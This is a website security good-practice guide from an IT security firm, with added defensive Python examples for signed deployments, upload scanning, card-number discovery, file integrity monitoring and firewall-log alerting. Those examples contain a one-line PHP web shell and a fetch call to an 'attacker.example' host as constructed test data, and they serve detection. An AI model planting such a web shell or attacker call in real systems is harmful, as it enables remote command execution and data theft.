
Website Security: A good practice guide

Not all digital certificates are equal!

If 2011 was the year of the breach, then 2013 can best be described as the year of the Mega Breach!

Authors: Computer Security Technology Ltd (CSTL) is a London-based independent IT security specialist with over 15 years of experience. CSTL supplies solutions, services and advice to safeguard business data. Through the protection of systems, CSTL drives user productivity and good governance.

This guide provides suggestions and recommendations for organisations whose website presence is vital to their business function: where the website must be robust and secure, while visitors are also safeguarded and can use it with confidence.

1. Protect your customers across the entire website by deploying SSL/TLS on all your web pages. SSL (Secure Sockets Layer), now superseded by TLS (Transport Layer Security), is the protocol that encrypts traffic to and from your website. To function it requires a digital certificate that binds your domain name to a public key; the matching private key stays on the server, and the browser uses the certificate to authenticate the server and agree the session keys that protect the traffic. Deploying it on every page, not just the login or payment pages, means visitors' session cookies and form data are never exposed in clear text, while a certificate from a trusted and well-recognised issuer instils confidence.

2. Build customer trust with the "green browser bar" by using SSL certificates with Extended Validation (EV) to secure public-facing web servers, and display recognised trust marks in highly visible locations on your website. The green browser bar is a simple way for people to identify that a website is using encryption to protect the information being exchanged and that the certificate was issued to a verified legal entity; as it becomes more widely recognised, it makes sense to modify your website so that visitors do not abandon their session. You can see how the green bar functions on the Lloyds Bank website (http://www.lloydsbank.com/): on the public site the address bar is normal, but once you click the logon button, as if you were going to access the online banking portal, the address bar turns green (safe) and the padlock appears (https://online.lloydsbank.co.uk/personal/logon/login.jsp?WT.ac=PLO0512).

Note: it is now an accepted check that clicking the padlock shows a summary of the digital certificate, in this case confirming that it was issued to Lloyds Bank.

This green browser bar denotes Extended Validation (EV): the issuer has verified the legal identity of the organisation behind the site, not merely its control of the domain name. Having EV certificates helps ensure your website is not distrusted or abandoned by visitors who expect to be greeted with this symbol of security. Note that Chrome and Firefox withdrew the distinct green EV address bar in 2019, so the padlock and the certificate details behind it are now the check to teach your visitors; EV still means stronger vetting of the certificate holder.

3. Watch for attempted connections to known malicious or suspicious hosts from your servers. Virus authors and cyber criminals have realised that dropping a malicious payload onto specific targets takes time; instead they infect websites that are trusted and likely to be visited by their ultimate targets. These are termed "watering hole" attacks, by analogy with a predator that, rather than hunting its prey, hides where the prey is likely to come to drink: the targets come to it. A compromised web server usually has to fetch its payload from, or report back to, attacker-controlled infrastructure, so an outbound connection from a web server to a host it has no business talking to is one of the earliest signs that your site has become the watering hole. The latest ISTR (Internet Security Threat Report) shows that 77 percent of legitimate websites had exploitable vulnerabilities, and 1 in 8 of all websites had a critical vulnerability. That gives attackers plenty of choice of websites on which to place their malware and entrap their victims (who could well be your customers).

4. Implement physical security to protect your assets from theft. This may sound obvious; however, security breaches are not always the result of complicated attacks, but of simple oversight and tardiness. Ensuring that the physical location where the website server is hosted is safe from unauthorised entry underpins your other security policies: no unauthorised changes to the website, no loss of data through physical theft, and no loss of data through local misuse of removable media. If you sub-contract the hosting to a third party, the cloud, or a commercial datacentre, ensure that you:

- Ask them to confirm their security arrangements.
- Find out whether they meet your minimum security requirements; ideally they should exceed them.
- Ask for copies of the latest and previous security audit results.
- Request all of the above on a regular schedule, not just when the service commences.
- Have a security mandate built into their contract with formal security SLAs.
- Ensure they are obliged to inform you of all breaches of their datacentres within a defined timescale, not just breaches of your own web servers.

5. Use separate Test Signing and Release Signing infrastructures. The best security can fail through the best of intentions: for instance a development team rushing out a new web application or site update to meet commercial demands and, in the rush, skipping validation and testing steps. The "in development" build suddenly appears "in production", and nobody notices until the breach. Signing test builds and released builds with different keys, and having production trust only the release key, means a rogue or premature website update fails verification and is quickly and easily identified, passing release control back to the correct parties and enforcing change control. If you accept the axiom "it costs a penny to build security into the design, a pound to insert it afterwards, and a hundred pounds to rework it", then preventing an untested release saves resources and cost.
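The deploy-time gate that point 5 describes, as an added example (not CSTL's code or any product's): a deployment bundle is signed under a named signer, and each environment carries its own trust store. Production knows only the release key, so a bundle signed with the test key is refused before it is served, as is a bundle whose files were altered after signing. HMAC-SHA256 stands in for a code-signing scheme so the example runs with the standard library alone; the keys, bundle and signer names are constructed for illustration.

```python
"""Deploy gate: accept a bundle only if it was signed by a key the target
environment trusts.  Added example, not CSTL's code.

HMAC-SHA256 is used in place of asymmetric code signing so this runs with the
standard library; a real pipeline would use X.509 code-signing certificates or
a transparency-log based signer with exactly the same trust-store split.
"""
import hashlib
import hmac
import json
from typing import Dict, Tuple

# Constructed keys.  The release key lives in an HSM/KMS reachable only by the
# release pipeline; the test key is available to developers and MUST NOT be
# present in production's trust store.
RELEASE_KEY = b"release-signing-key-example-do-not-use"
TEST_KEY = b"test-signing-key-example-do-not-use"

# Trust stores per environment, keyed by signer name.
PRODUCTION_TRUST = {"release": RELEASE_KEY}
STAGING_TRUST = {"release": RELEASE_KEY, "test": TEST_KEY}


def manifest_for(files: Dict[str, bytes]) -> bytes:
    """Canonical manifest (sorted path -> sha256) so one signature covers
    every file in the deployment bundle."""
    digests = {p: hashlib.sha256(d).hexdigest() for p, d in files.items()}
    return json.dumps(digests, sort_keys=True, separators=(",", ":")).encode()


def sign(files: Dict[str, bytes], signer: str, key: bytes) -> dict:
    """Signature envelope naming the signer, so verification can say who signed."""
    tag = hmac.new(key, manifest_for(files), hashlib.sha256).hexdigest()
    return {"signer": signer, "sig": tag}


def verify(files: Dict[str, bytes], envelope: dict, trust: Dict[str, bytes]) -> Tuple[bool, str]:
    """Return (ok, reason).  Fails closed on unknown signers and on any
    mismatch between the signed manifest and the bundle actually presented."""
    signer = envelope.get("signer")
    key = trust.get(signer)
    if key is None:
        return False, f"signer {signer!r} not trusted in this environment"
    expected = hmac.new(key, manifest_for(files), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, envelope.get("sig", "")):
        return False, "signature does not match bundle contents"
    return True, f"signed by {signer}"


# Constructed deployment bundle.
BUNDLE = {"index.html": b"<html>...</html>", "app.js": b"console.log('hi')"}


def demo() -> Dict[str, Tuple[bool, str]]:
    release_env = sign(BUNDLE, "release", RELEASE_KEY)
    test_env = sign(BUNDLE, "test", TEST_KEY)
    tampered = {**BUNDLE, "app.js": b"fetch('https://attacker.example')"}
    return {
        "release_to_prod": verify(BUNDLE, release_env, PRODUCTION_TRUST),
        "test_to_prod": verify(BUNDLE, test_env, PRODUCTION_TRUST),
        "test_to_staging": verify(BUNDLE, test_env, STAGING_TRUST),
        "tampered_to_prod": verify(tampered, release_env, PRODUCTION_TRUST),
    }


if __name__ == "__main__":
    for case, (ok, reason) in demo().items():
        print(f"{case:17} {'ALLOW' if ok else 'BLOCK'}  {reason}")
```

The point of the example is the second case: the test-signed bundle is valid cryptographically, and staging accepts it, yet production rejects it purely because the test signer is absent from production's trust store. That is the enforcement of change control the text is after.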

Does it surprise you that approximately 67 percent of websites used to distribute malware were identified as legitimate, compromised websites?

6. Trust your digital certificates. Use an established, trustworthy Certificate Authority that demonstrates excellent security practices. A certificate is only as good as the authority that issues it: like a house built on poor foundations, it may function for a short while, but it is only a matter of time before the structure fails. With certificates, the integrity of the issuer is the key to robustness: to what extent does the authority check the background of the requestor, and has it deployed sufficient security and safeguards to protect against mis-issuance, certificate fraud and compromise of its own systems? Having to revoke and replace a certificate after it has been deployed, whether because of a mistake by the user or a failure at the issuer, can be a costly exercise; as with the house, it is more effective to get it right first time: "pay cheap, pay twice".

7. Defend your website against malware infection, cyber-attacks and threat propagation.

The vulnerability chart (Source: ISTR 2014) demonstrates that the number of disclosed vulnerabilities continues to grow, providing would-be attackers with a rich and diverse pool of exploits to use against your website.

a. Ensure any file transferred to or from your website is scanned before the file is stored or processed. Solutions now exist that scan the actual file transfer stream, and that scan within proprietary storage systems that conventional scanners would otherwise skip. Does your site allow the public to upload files? If it does, then preventing a malicious file from ever making contact with your site is good practice: you do not want to be removing and [...] elsewhere, and preferably outside your perimeter ingress points altogether. A good example is a business that provides loans, where brokers submit loan requests along with supporting documentation through the website, and the requests and documentation are routed to internal systems for automated processing. If standard anti-virus is running only on those systems, it is at that point that the threat is detected and, if possible, cleaned or deleted, typically resulting in the production systems being taken offline and affecting not just that loan request but every other request due for processing on the same host. It would be far better to inform the brokers as they submit the documents, before the documents reach the website, effectively passing the clean-up problem back to the brokers. The same scenario applies to sites that allow CVs to be uploaded, or that provide a portal for lodging customer support requests: if a document can be copied to a website, scanning should be applied before it reaches the website, not afterwards.
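An upload gate of the kind point 7a describes, as an added example (not CSTL's code or a particular scanning product): the upload is consumed as a stream and nothing is written to storage until the whole body has been judged. The checks are stand-ins for a real scanning engine: a size limit, a declared-type versus content check using file magic bytes, refusal of executables whatever they are named, and the EICAR anti-virus test string (the industry's harmless test signature) as the "known bad" pattern. The accepted types, size limit and sample uploads are constructed for the loan-broker scenario above.

```python
"""Scan an upload while it is still in transit, before it is stored or handed
to back-office systems.  Added example, not CSTL's code.
"""
import hashlib
from typing import Iterable, Tuple

# EICAR test string: every anti-virus product detects it and it is harmless.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

MAX_BYTES = 10 * 1024 * 1024  # constructed policy limit for broker documents

# Magic bytes for the document types this constructed portal accepts.
ALLOWED_MAGIC = {
    ".pdf": b"%PDF-",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".docx": b"PK\x03\x04",  # OOXML is a zip container
}
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF")  # Windows PE, Linux ELF


def scan_stream(filename: str, chunks: Iterable[bytes]) -> Tuple[bool, str, str]:
    """Consume the upload chunk by chunk; return (accepted, reason, sha256).

    Nothing is persisted here.  The caller stores the body only if accepted is
    True; otherwise the reason goes straight back to the submitter, who owns
    the clean-up (the broker, the applicant, the support requester).
    """
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_MAGIC:
        return False, f"file type {ext or '(none)'} not accepted", ""

    digest = hashlib.sha256()
    head = b""   # first 16 bytes, for the magic-byte checks
    tail = b""   # carry-over so a signature split across two chunks is still found
    total = 0
    for chunk in chunks:
        total += len(chunk)
        if total > MAX_BYTES:
            return False, "exceeds size limit", ""
        digest.update(chunk)
        if len(head) < 16:
            head += chunk[:16 - len(head)]
        window = tail + chunk
        if EICAR in window:
            return False, "known malicious content (EICAR test signature)", digest.hexdigest()
        tail = window[-(len(EICAR) - 1):]

    if head.startswith(EXECUTABLE_MAGIC):
        return False, "executable content disguised as a document", digest.hexdigest()
    if not head.startswith(ALLOWED_MAGIC[ext]):
        return False, f"content does not match declared type {ext}", digest.hexdigest()
    return True, "clean", digest.hexdigest()


def chunked(data: bytes, size: int = 7) -> Iterable[bytes]:
    """Constructed helper: feed a byte string in small chunks, like a socket."""
    for i in range(0, len(data), size):
        yield data[i:i + size]


# Constructed sample uploads.
SAMPLES = {
    "payslip.pdf": b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "statement.pdf": b"%PDF-1.4\n" + EICAR + b"\n%%EOF\n",   # malware inside a real-looking PDF
    "proof.pdf": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 40,  # executable renamed to .pdf
    "photo.png": b"GIF89a" + b"\x00" * 20,                      # wrong type for the extension
    "macro.exe": b"MZ" + b"\x00" * 20,                          # type never accepted
}


def triage() -> dict:
    """Verdict (accepted, reason) for each constructed sample."""
    return {name: scan_stream(name, chunked(body))[:2] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ok, why) in triage().items():
        print(f"{'ACCEPT' if ok else 'REJECT':6} {name:15} {why}")
```

The stream is never assembled in full: the only state kept between chunks is the running hash, the first 16 bytes and a 67-byte tail, which is what lets the same logic sit in front of the web tier rather than on it.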

b. Undertake regular vulnerability assessments (VA) and periodic penetration (pen) testing of web servers and web applications to detect exploitable conditions. Pen testing should be undertaken regularly by ethical engineers to mimic an attack and identify how an attack could succeed; it is obviously better to have a vulnerability detected benignly than exploited by a real attacker. Consider using a pen tester who conforms to UK industry standards and has been vetted by an organisation such as CREST. It is also important that a pen test is not confused with a vulnerability assessment. A good pen tester will use a multitude of VA tools to identify possible weaknesses and then have the skills to exploit those weaknesses to mimic a real attack; additionally the pen tester should have sufficient experience to compromise a system that would seemingly not be vulnerable. It is good practice to run weekly automated VA scans of all systems, along with an annual pen test of perimeter ingress routes, web application build strength and high-risk/high-value systems, and a re-test after any significant change to the application. The combination of ongoing VA and periodic pen testing supports a defence-in-depth approach, eliminating single points of failure and providing a robust risk-reduction strategy.

c. Use encryption to store and transfer sensitive data processed by your website. Encryption is the most effective single control for reducing the risk of data leakage from your website. Encryption at rest covers data stored on your systems; encryption in transit, as the name suggests, covers the path from one location to another (such as SSL/TLS or a VPN), or encrypting a file as the transfer is initiated and decrypting it at the recipient. Neither helps with data you do not know you hold: it is not uncommon for websites to store sensitive information by accident, such as customer address records uploaded for a website function and never removed, or historical credit card details long forgotten. Use the pen testing services mentioned above to conduct a sensitive-data inventory of the website, and make that inventory a regular habit.
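The sensitive-data inventory that point 7c recommends, as an added example (not CSTL's code or a pen-test vendor's tool): a scanner that walks a web root looking for forgotten payment card numbers. A bare regex for long digit runs drowns in false positives (order references, timestamps), so every candidate is validated with the Luhn check digit that card numbers carry, and findings are reported masked so the inventory does not become another copy of the data it is hunting. The sample web root, with a forgotten CSV upload and a card number leaked into an access log, is constructed.

```python
"""Sensitive-data inventory: find probable card numbers in files a website
serves or stores.  Added example, not CSTL's code.
"""
import os
import re
import tempfile
from typing import Dict, List

# 13-19 digits, optionally separated by single spaces or dashes, not embedded
# in a longer digit run.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn mod-10 check carried by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep first six and last four, the usual PCI DSS display rule."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(text: str) -> List[str]:
    """Masked, Luhn-valid card-number candidates found in text, in order."""
    found = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            found.append(mask(digits))
    return found


def inventory(root: str, max_bytes: int = 5_000_000) -> Dict[str, List[str]]:
    """Walk a web root and report files containing probable card numbers."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > max_bytes:
                continue            # large binaries need a different approach
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", errors="ignore")
            hits = find_pans(text)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed sample web root.  4111..., 5555...4444 and 4012...1881 are the
# well-known Luhn-valid test numbers; 1234567890123456 fails Luhn.
SAMPLE_FILES = {
    "uploads/customers_2012.csv": "id,name,card\n1,A Smith,4111 1111 1111 1111\n2,B Jones,5555-5555-5555-4444\n",
    "index.html": "<p>Order ref 1234567890123456 shipped</p>",
    "logs/access.log": "GET /img/4012888888881881.png 200\n",
}


def demo() -> Dict[str, List[str]]:
    """Build the sample web root in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
        return inventory(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

The access-log hit is the one worth noticing: a card number that reached the server in a URL is now sitting in plain text in a file that encryption at rest or in transit was never applied to, which is exactly why the inventory has to be run rather than assumed.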

8. Plan and protect against Distributed Denial of Service (DDoS) attacks.

A US man was recently given two years' federal probation and a fine of some £120,000 for his part in a DDoS attack against a multinational corporation; the objective was to disrupt the business by preventing its website from working. Unfortunately only a small number of these attackers are ever caught. DDoS attacks come in three main types: volumetric, application-layer and state exhaustion. Volumetric attacks consume your internet bandwidth with junk traffic to the point where no legitimate bandwidth remains for the website to function. Placing DDoS mitigation solely at the business gateway is therefore pointless, because the internet pipe is already saturated upstream of it; it is better to use a cloud-based solution that diverts attack traffic away from the web host while allowing legitimate traffic to continue to the website as normal. Application-layer and state-exhaustion attacks both aim to exhaust a resource rather than bandwidth: state exhaustion fills connection tables, memory or protocol state (for example with half-open TCP connections) with work that can never be completed, while application-layer attacks send requests that look legitimate but are expensive for the web application to process. To defend against these, harden the host systems (see VA and pen testing) and deploy systems that can detect and drop such attack connections, such as SYN-flood protection and per-source rate limiting. The best solution combines on-site and cloud-based DDoS mitigation to deal with all types of risk.

9. Lock down key system resources. Prevent inadvertent or malicious changes, to defend against website defacement and loss of confidential data. Consider solutions that provide File Integrity Monitoring (FIM) and system hardening. Such technologies fall under Host Intrusion Detection (HIDS): solutions that actively monitor the events and activity of a host, in this case the web server and its application. Typically the FIM component records a baseline of cryptographic hashes (and permissions) of the released website files, stored and signed away from the web server, and periodically compares the production site against it. Any disparity is an unauthorised change, allowing you to determine whether it was merely a legitimate change made without due change-control authority, or a real threat such as a web defacement or the installation of a web shell, trojan or other malware.
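The FIM comparison that point 9 describes, as an added example (not CSTL's code or a particular HIDS product): a baseline of SHA-256 hashes and permission bits is taken at release time, sealed with an HMAC so that an attacker who can edit the web root cannot quietly rewrite the baseline to match, and later compared against the live site. The scenario (a defacement, a dropped web shell, a deleted file and a permission change) and the baseline key are constructed; in practice the key and the sealed baseline live on the monitoring host, not on the web server.

```python
"""File integrity monitoring for a web root: baseline at release time, then
compare the live site against it.  Added example, not CSTL's code.
"""
import hashlib
import hmac
import json
import os
import stat
import tempfile
from typing import Dict

BASELINE_KEY = b"constructed-baseline-hmac-key"  # held on the monitoring host in practice


def hash_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> Dict[str, dict]:
    """Hash every file under root and record permission bits too: a newly
    world-writable or executable file matters as much as changed content."""
    snap = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            snap[rel] = {"sha256": hash_file(path), "mode": stat.S_IMODE(os.stat(path).st_mode)}
    return snap


def seal_baseline(snap: Dict[str, dict]) -> bytes:
    """Serialise the baseline with an HMAC tag so edits to it are detectable."""
    body = json.dumps(snap, sort_keys=True)
    tag = hmac.new(BASELINE_KEY, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"body": body, "tag": tag}).encode()


def open_baseline(sealed: bytes) -> Dict[str, dict]:
    """Refuse a baseline whose tag does not verify; that is an alert in itself."""
    doc = json.loads(sealed)
    expected = hmac.new(BASELINE_KEY, doc["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["tag"]):
        raise ValueError("baseline integrity check failed")
    return json.loads(doc["body"])


def compare(baseline: Dict[str, dict], current: Dict[str, dict]) -> Dict[str, list]:
    """Classify every disparity so the operator can triage it."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, mode_changed = [], []
    for rel in sorted(set(baseline) & set(current)):
        if baseline[rel]["sha256"] != current[rel]["sha256"]:
            modified.append(rel)
        elif baseline[rel]["mode"] != current[rel]["mode"]:
            mode_changed.append(rel)
    return {"added": added, "removed": removed, "modified": modified, "mode_changed": mode_changed}


def write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> Dict[str, list]:
    """Constructed scenario: a release, then a defacement, a dropped web shell,
    a deleted file and a permission change on the live web root."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "index.html", b"<h1>Welcome</h1>")
        write(root, "js/app.js", b"console.log('ok')")
        write(root, "robots.txt", b"User-agent: *\n")
        write(root, "img/logo.png", b"\x89PNG\r\n\x1a\n")
        sealed = seal_baseline(snapshot(root))                          # taken at release

        write(root, "index.html", b"<h1>Defaced</h1>")                    # defacement
        write(root, "uploads/cmd.php", b"<?php system($_GET['c']); ?>")  # web shell
        os.remove(os.path.join(root, "robots.txt"))                      # deletion
        os.chmod(os.path.join(root, "img/logo.png"), 0o777)              # permission change
        return compare(open_baseline(sealed), snapshot(root))


def baseline_tamper_detected() -> bool:
    """An attacker who edits the baseline to match their changes is caught."""
    doc = json.loads(seal_baseline({"index.html": {"sha256": "0" * 64, "mode": 0o644}}))
    doc["body"] = doc["body"].replace("0" * 64, "1" * 64)
    try:
        open_baseline(json.dumps(doc).encode())
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:13} {paths}")
```

Each category needs a different response: a modified index.html or an added file under uploads/ is a probable compromise, whereas a modified file that matches a recent release ticket is the change-control failure the text mentions, and the two should not land in the same queue.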

10. Monitor your infrastructure for network intrusions, propagation attempts, and other suspicious traffic patterns. The firewall is a good place to start proactively reviewing and analysing traffic logs and events to detect suspicious activity. A step forward is to use a Network Intrusion Detection System (NIDS), or a SIEM (Security Information and Event Management) solution to collect logs from across the network and give you a complete picture of activity. Many organisations state that they look at firewall logs after suspicious activity, which in effect means that they seldom do, and when they do it is too late anyway. Conversely, a common complaint is that they have lots of data and little information. In both situations, technology that automatically collects, categorises and alerts (such as a SIEM) provides great benefit to the protection and integrity of the website. Some technologies combine website analytics with security incident detection so that production as well as security issues can be analysed together.
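Detection logic of the kind a SIEM rule would carry, as an added example (not CSTL's code or any product's), serving both point 3 (watch for connections from your servers to suspicious hosts) and point 10 (analyse firewall logs proactively rather than after the fact). A web server should only initiate connections to a short allow-list (database, DNS, patch mirror), so any other outbound connection from the web tier is worth an alert even before a threat feed confirms the destination, and repeated hits to the same unexpected host are summarised because a beacon looks like a steady drip of identical connections rather than one event. The iptables-style log lines, addresses, allow-list and blocklist are all constructed.

```python
"""Alert on outbound connections from the web tier that break policy, with
known-bad destinations ranked highest.  Added example, not CSTL's code.
"""
import re
from collections import Counter
from typing import Dict, List

# Constructed syslog-style firewall lines (iptables LOG-like fields).
LOG_LINES = """\
Mar  3 10:01:02 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=10.0.2.20 PROTO=TCP DPT=3306 ACTION=ACCEPT
Mar  3 10:01:07 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=10.0.2.20 PROTO=TCP DPT=3306 ACTION=ACCEPT
Mar  3 10:01:09 fw kernel: FW-IN IN=eth0 OUT=eth1 SRC=198.51.100.7 DST=10.0.1.10 PROTO=TCP DPT=443 ACTION=ACCEPT
Mar  3 10:02:15 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=203.0.113.45 PROTO=TCP DPT=8080 ACTION=ACCEPT
Mar  3 10:03:15 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=203.0.113.45 PROTO=TCP DPT=8080 ACTION=ACCEPT
Mar  3 10:04:15 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=203.0.113.45 PROTO=TCP DPT=8080 ACTION=ACCEPT
Mar  3 10:04:40 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.11 DST=192.0.2.99 PROTO=TCP DPT=443 ACTION=ACCEPT
Mar  3 10:05:01 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.10 DST=10.0.2.30 PROTO=UDP DPT=53 ACTION=ACCEPT
Mar  3 10:05:30 fw kernel: FW-OUT IN=eth1 OUT=eth0 SRC=10.0.1.11 DST=203.0.113.9 PROTO=TCP DPT=25 ACTION=DROP
"""

WEB_TIER = {"10.0.1.10", "10.0.1.11"}
# (host, port) pairs the web tier is allowed to initiate: database and DNS.
OUTBOUND_ALLOW = {("10.0.2.20", 3306), ("10.0.2.30", 53)}
# Constructed threat-intelligence list of known malicious hosts.
BLOCKLIST = {"203.0.113.45", "203.0.113.9"}

FIELD = re.compile(r"(\w+)=(\S+)")


def parse(line: str) -> Dict[str, str]:
    """Pull KEY=VALUE fields, timestamp and direction out of a firewall line."""
    rec = dict(FIELD.findall(line))
    rec["ts"] = line[:15]
    rec["dir"] = "out" if "FW-OUT" in line else "in"
    return rec


def analyse(lines: str) -> List[dict]:
    """Alerts for outbound web-tier connections that are not on the allow-list,
    one per (source, destination, port, action), counted and dated.

    A DROP to a known-bad host is still an alert: the firewall did its job,
    but something on the web server tried to reach that host.
    """
    seen = Counter()
    first_seen = {}
    for line in lines.splitlines():
        rec = parse(line)
        if rec["dir"] != "out" or rec.get("SRC") not in WEB_TIER:
            continue
        dst, port = rec["DST"], int(rec["DPT"])
        if (dst, port) in OUTBOUND_ALLOW:
            continue
        key = (rec["SRC"], dst, port, rec["ACTION"])
        seen[key] += 1
        first_seen.setdefault(key, rec["ts"])

    alerts = []
    for (src, dst, port, action), count in seen.items():
        known_bad = dst in BLOCKLIST
        alerts.append({
            "severity": "high" if known_bad else "medium",
            "src": src, "dst": dst, "port": port, "action": action,
            "count": count, "first_seen": first_seen[(src, dst, port, action)],
            "reason": "known malicious host" if known_bad else "destination not in web-tier allow-list",
        })
    # Known-bad first, then by time of first sighting.
    return sorted(alerts, key=lambda a: (a["severity"] != "high", a["first_seen"]))


if __name__ == "__main__":
    for a in analyse(LOG_LINES):
        print(f"[{a['severity']:6}] {a['src']} -> {a['dst']}:{a['port']} x{a['count']} "
              f"{a['action']} since {a['first_seen']}  {a['reason']}")
```

Run against the sample, the inbound visitor traffic and the database and DNS lookups produce nothing, while the three connections a minute apart from 10.0.1.10 to 203.0.113.45:8080 collapse into one high-severity alert with a count of three: the "lots of data, little information" problem reduced to a line an operator can act on.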

Acknowledgement: some of the statistics and report extracts are from the Symantec Internet Security Threat Report (ISTR) released May 2014; the full report is available upon request.

More information on the topics discussed, solutions, and services to secure websites and information is available from:

Computer Security Technology Ltd (CSTL)
Tel: 020 7621 7836
Email: info@cstl.com
